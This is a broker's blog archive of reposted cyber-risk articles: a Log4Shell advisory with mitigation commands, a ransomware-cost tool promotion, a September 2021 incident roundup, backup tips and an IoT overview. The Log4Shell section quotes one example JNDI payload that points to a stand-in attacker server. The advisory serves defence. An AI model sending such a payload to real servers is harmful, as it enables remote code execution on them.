1-888-643-2217 Email ABEX
Keeping you updated

Category Archives: Cyber Risk Management

Log4Shell Vulnerability

Log4Shell (CVE-2021-44228) is a critical vulnerability that has been actively exploited and scanned for by malicious actors since its discovery beginning of December. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

What is Log4j 2?

The Log4Shell vulnerability results from how log messages are being handled by the processor in log4j2, an open-source logging service provided by the Apache Group that provides logging for numerous projects. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

An attacker can send a specially crafted message, which contains a link to a server they control. For example, they may send a message including the string ${jndi:ldap://evil.xa/x}, where ldap://evil.xa is the attacker-controlled server.

The specially crafted message is passed to the log4j library so it can be logged, but in doing so it queries the malicious server. The malicious server will then respond with directory information, along with whatever code the attacker wants to execute on the victim server. Finally, the victim server downloads this response and executes the code included in the response.

Some of the products known to be using this, and therefore vulnerable to the vulnerability, are:

Apache Druid
Apache Dubbo
Apache Flink
Apache Flume
Apache Hadoop
Apache Kafka
Apache Solr
Apache Spark
Apache Struts
Apache Tapestry
Apache Wicket
Elastic Elasticsearch
Elastic Logstash
Ghidra
Grails
Minecraft
Apache Tomcat
Dropwizard
Elastic Kibana
Hibernate
JavaServer Faces
Oracle ATG Web Commerce
Spring Framework

Why is this critical?

The vulnerability itself allows an attacker to load arbitrary – potentially malicious – code into the target server. This code might add a backdoor to a server, cryptojack or even carry out a ransomware attack.

The vulnerability was published earlier in December alongside a working proof-of-concept that would enable malicious actors to exploit it.

How to mitigate?

To mitigate against this vulnerability, we recommend installing the latest updates (2.15.0 or later), and the regular and timely updating of any affected third-party software. This should be done on all devices, not only those directly exposed to the internet.

To support the first priority action above, you also should determine if Log4j is installed elsewhere. Java applications can include all the dependent libraries within their installation. To do this, you should undertake a file system search for log4j, searching inside EAR, JAR and WAR files e.g.:

find / -type f -print0 |xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

If a dependency or package manager is used, this can be searched. For example:

dpkg -l | grep log4j

There could be multiple copies of Log4j present and each copy will need to be updated or mitigated.

If updating Log4j 2 is not feasible, this vulnerability can still be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true”. This can be done by restarting the Java service through the use of an argument:

java -Dlog4j2.formatMsgNoLookups=true …

or you can set an Environment Variable for the JVM arguments:

JAVA_OPTS=-Dlog4j2.formatMsgNoLookups=true

Please contact your IT department with any questions on updates needed.

Source: www.cfcunderwriting.com

 


How Much Could Ransomware Cost Your Client?

CFC’s new tool helps you find the answer.

Ransomware attacks are a disproportionately expensive type of cyber event, accounting for 81% of all cyber-related losses last year. But how much it costs an individual business depends on their industry sector and size as well as a number of other factors, from how long they were out of action to whether sensitive data was stolen.

Built from data analysis relating to thousands of cyber events handled by CFC, this new tool gives users low, medium, and high severity ransomware loss estimates based on just four simple pieces of business information. It also generates a bespoke, downloadable report explaining the methodology used.

Try it out and help your clients get to grips with the single biggest cyber threat facing their business today.

Click here to enter CFC’s brand new ransomware calculator.

Source: www.cfcunderwriting.com


September Cyber Incidents

It’s been busy in the world of cyber risk, and September is no exception. In the past month, we’ve seen big players like Apple and Microsoft suffer zero-day vulnerabilities as well as ransomware continuing to wreak havoc across the globe.

  1. The return of the REvil ransomware groupThe REvil ransomware gang has returned and is attacking new victims and publishing their stolen files.

    Following a massive attack on July 2nd, which exploited a zero-day vulnerability in the Kaseya VSA platform to encrypt 60 managed service providers and over 1,500 businesses, REvil shut down their infrastructure and completely disappeared. The attack’s impact was felt worldwide, bringing the attention of international law enforcement, and the REvil gang suddenly shut down on July 13th.

    To everyone’s surprise, the REvil ransomware gang came back to life on 7th September under the same name when the Tor payment/negotiation and data leak sites suddenly turned back on and became accessible. Proof of new attacks emerged on September 9th when someone uploaded a new REvil ransomware sample compiled on September 4th to VirusTotal. On September 11th, the group published screenshots of stolen data for a new victim on their data leak site.

  2. Windows MSHTML zero-day exploits shared between attackersThreat actors are sharing Windows MSHTML zero-day (CVE-2021-40444) tutorials and exploits on hacking forums, allowing other hackers to start exploiting the new vulnerability in their own attacks.

    On 7th September, Microsoft disclosed a new zero-day vulnerability in Windows MSHTML that allows threat actors to create malicious documents, including Office and RTF docs, to execute commands on a victim’s computer remotely. After the vulnerability was disclosed, Microsoft Defender and other security programs were configured to detect and block parts of this attack.

    While these mitigations will help, as the exploit has been modified not to use ActiveX controls, users are still at risk until an official security update is released. Until Microsoft releases a security update, everyone should treat all Word and RTF attachments suspiciously and their source manually verified before opening them.

  3. Olympus hit with BlackMatter ransomwareOlympus, a leading medical technology company, is investigating a “potential cybersecurity incident” that impacted some of its EMEA IT systems last week. Olympus has more than 31,000 employees worldwide and over 100 years of history developing for the medical, life sciences, and industrial equipment industries.

    While Olympus did not share any details on the attackers’ identity, ransom notes left on systems impacted during the breach point to a BlackMatter ransomware attack. The same ransom notes also point to a Tor website the BlackMatter gang has used in the past to communicate with victims.

  4. Apple patches zero-day flaw exploited by NSO GroupApple has released security updates for a zero-day vulnerability that affects every iPhone, iPad, Mac and Apple Watch. Citizen Lab, which discovered the vulnerability and was credited with the find, urges users to immediately update their devices.

    Citizen Lab said it has now discovered new artifacts of the ForcedEntry vulnerability which it first revealed in August as part of an investigation.

    This exploit is significant because it breaks through new iPhone defenses that Apple had baked into iOS 14, dubbed BlastDoor, which were supposed to prevent silent attacks by filtering potentially malicious code. Citizen Lab calls this exploit ForcedEntry for its ability to skirt Apple’s BlastDoor protections.

    Citizen Lab said it attributes the ForcedEntry exploit to NSO Group with high confidence, citing evidence it has seen that it has not previously published.

Source: www.cfcunderwriting.com


Cyber Tips: Backup Policies

Data is the most valuable part of a computer system and may be irreplaceable if lost to a ransomware attack or a hardware failure, or if it becomes corrupted.  The following tips will assist you planning and preparing a backup policy for an incident in case the worst happens.

What is a backup policy?

A backup policy is a well-thought-out plan to mitigate against data loss that could happen due to a ransomware attack, hardware failure, data corruption, or some other detrimental event. If implemented well, it can help an organization to return to business as usual more quickly and easily.

The complexity of the backup policy will depend on the size of the organization, the number of applications and databases it uses, and the quantity of data that requires backing up. It will also depend on company policy and regulatory obligations applicable to the organization.

How do I implement backup policy best practice?

1. Identify your most critical data and plan accordingly

By identifying the most critical data to your business, resources can be allocated to ensure that this data is protected and prioritized. Backups can be tailored to that particular data accordingly.

2. Take frequent backups

If you have mission-critical data, then attention should be paid to the frequency of the backups that are taken.

3. Use the 3-2-1 approach to backups

Create three copies of your data in addition to the original file, using two different backup media types stored locally and one copy stored remotely offsite.

Backups should be isolated or air-gapped from the network when not actively backing up data.  Backup media should never be permanently connected physically or over the network.

4. Employ versioning to data

Backups should contain old versions of your data, not just current versions of files backed up most recently. This is important in case of file corruption or ransomware that may be lurking in current data backups.

5. Periodically test the integrity of your backups

Data should be checked regularly to ensure that it is accessible and readable.

Other considerations for your backup policy

o  Data should be encrypted when backed up. This will help prevent unauthorized access.

o  Consider making your backups immutable, so they cannot be altered by you or the bad actors.

o  Consider using remote storage. Cloud based storage can be a cost-effective option if managed correctly.

o  Automate backups where possible. This will make the practice of backing up your data a part of everyday business.

o  Consider the retention period for your backups. This is especially important if you are using cloud services to back up your data.  Cloud data storage costs can mount up so determine a sensible length of time for storage in your backup policy, considering legal and regulatory obligations.

o  Consider your data retention policy. Do you actually need all the data that you are storing and backing up? Often data is stored unnecessarily adding an unnecessary cost and has additional security burdens if exposed.

Source: www.cfcunderwriting.com


What is the Internet of Things?

Dongles, Fitbits, Alexa, smart watches and more – we are all familiar with these handy pieces of tech. With ever-increasing functionality and user hype, the Internet of Things (IoT) is no doubt a growth market. But what defines IoT? How did we get here? What are the risks? And how much further can this tech go?

What is IoT?

It is estimated that there is a staggering 31 billion IoT devices online, but what exactly are they? The IoT refers to devices with embedded technologies that allow them to exchange data with other devices and systems over the Internet.  An example of this is a smart home equipped with various interconnected devices (e.g., smart lighting, smart thermostats etc.) that can be controlled from a single app or device. Being able to turn on the heating and launch your favourite playlist before you have even stepped foot in your home, all from your phone, is surely not a bad thing.

IoT devices are also being deployed increasingly for commercial application. A study in the US estimates that 35% of manufacturers utilize IoT sensors within their manufacturing processes. Sensors can track parts as they move through the assembly line, giving process engineers improved oversight compared to traditional methods. This increased transparency can drive down costs for manufacturers and improve their bottom line.

How did we get here?

Technology companies have been trying to connect devices to the Internet for well over 40 years, with one of the first examples being a vending machine in the 1980s. This allowed the vending machine to report on its inventory and whether or not drinks were cold. For many reasons early attempts to develop this technology were largely unsuccessful. This quickly changed with the advent of smaller, cheaper to produce chips that could efficiently connect devices to the Internet. By 1999, technology pioneer Kevin Ashton had coined the phrase “Internet of Things”.

What are the key exposures for IoT devices?

Cyber vulnerabilities: Given their size, it is often hard to integrate robust cyber defences into IoT devices to fend off hackers. Once a hacker gains access, they can infiltrate the network the smart device is connected to. In what sounds like a Hollywood blockbuster movie, hackers managed to gain access to a casino’s network via a smart thermometer located in the fish tank, walking away with 10 gigabytes of the casino’s data – not quite suitcases of cash but just as valuable!

Intellectual property exposure: IoT is a competitive market with many large companies fighting for market share, but with this comes the very real potential for IP litigation. In particular, the complex nature of IoT can mean that companies can unknowingly infringe patented inventions and risk IP infringement allegations from competitors.

Bodily injury and property damage: Given the fact that IoT involves physical devices, there is an inherent exposure to bodily injury/property damage when compared to a non-hardware-based technology. For instance, the FDA had to recall 500,000 pacemakers in 2017 after concerns around cyber vulnerabilities which could be exploited to drain the battery or alter the heartbeat. The recall did not involve replacement of the pacemakers. Instead, medical staff were able to patch the security holes. Nonetheless, this highlights our reliance on IoT for critical functions and the potential for catastrophic loss.

What does the future look like for this growth area?

It is safe to say that the number of IOT devices will only increase and their functionality will also become more sophisticated. For better or worse, IoT is here to stay. Here are a couple of ways IoT may change the world in the coming years:

The idea of a “smart home” is something we are familiar with, but the idea of a “smart city” is still being developed. IoT has the potential to change the way we interact with the cities we inhabit. Smart cities will use a host of IoT devices to collect data using sensors, which can then be analyzed to improve health services, transport infrastructure and other services.

Farming is one of the oldest industries in the world, and while it has grown leaps and bounds from the days of horse-drawn farming, IoT has the ability to further modernize the sector. For example, sensors can be used to monitor weather conditions, livestock, agricultural drones and assist with crop management. Smart farms can drive efficiencies and bring down costs, making farming more profitable and environmentally friendly.

Global research firm Gartner estimates that by 2025 there will be 75 billion IoT devices connected to the Internet. The rapid rise of the number of units in circulation and the ever-increasing functionality of IoT brings with it increased exposures and risks.

Companies developing, manufacturing, or selling these devices need a comprehensive insurance policy to cover their exposures. CFC has a dedicated technology policy and an inhouse team of claims experts to deal with any issues that may arise. For more information, please contact ABEX or CFC.

Source: www.cfcunderwriting.com


Blog

FOLLOW OUR BLOG

Receive notifications of new posts automatically.



ABEX - AFFILIATED BROKERS EXCHANGE IS ON FACEBOOK.

Like us on Facebook

Connect with us on LinkedIn